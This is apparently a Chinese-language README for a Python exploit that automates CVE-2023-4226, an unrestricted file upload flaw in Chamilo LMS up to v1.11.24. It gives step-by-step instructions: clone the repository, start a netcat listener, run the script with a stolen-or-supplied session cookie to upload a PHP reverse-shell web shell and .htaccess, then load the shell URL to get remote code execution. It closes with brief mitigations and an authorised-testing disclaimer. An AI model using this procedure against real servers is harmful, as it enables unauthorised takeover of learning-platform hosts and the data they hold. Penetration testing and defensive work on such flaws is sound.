Python 脚本,用于自动化利用 Chamilo LMS(<= v1.11.24)中的 CVE-2023-4226 无限制文件上传漏洞。上传基于 PentesterMonkey 的 PHP Web Shell 并配置 .htaccess,以实现 反弹 Shell。更多详情请参阅:STAR Labs 公告。
/main/inc/ajax/work.ajax.php 上传 PHP 文件,导致远程代码执行(RCE)。ch_sid)。rce.php 中的 IP 和端口。/main/work/work.php?cidReq=HW。/main/inc/ajax/work.ajax.php 上传 rce.php 和 .htaccess。/app/cache/rce.php)。Python:requests、colorama。
pip install requests colorama
文件:rce.php(PentesterMonkey 版本,包含在仓库中)、.htaccess(由脚本生成)。
网络:用于监听器的 IP 和端口(例如 nc -lvnp 4444)。
克隆仓库:
git clone https://github.com/SkyW4r33x/CVE-2023-4226
cd CVE-2023-4226
赋予脚本执行权限:
chmod +x CVE-2023-4226.py
安装依赖:
pip install requests colorama
在一个终端中启动监听器:
nc -lvnp 4444
运行脚本:
./CVE-2023-4226.py
输入:
ch_sid Cookie。访问 Web Shell 以触发反弹 Shell:
http://<chamilo>/app/cache/rce.php
示例:http://chamilo.local/app/cache/rce.php
更新到 Chamilo >= v1.11.26。
对文件名进行消毒处理。
在 disable_dangerous_file() 中阻止 HTML 内容。
在 .htaccess 中添加:
RedirectMatch 403 ^/main/inc/lib/javascript/bigupload/files
Header set X-Content-Type-Options nosniff
仅供 授权测试 使用。未经授权的使用是 非法的。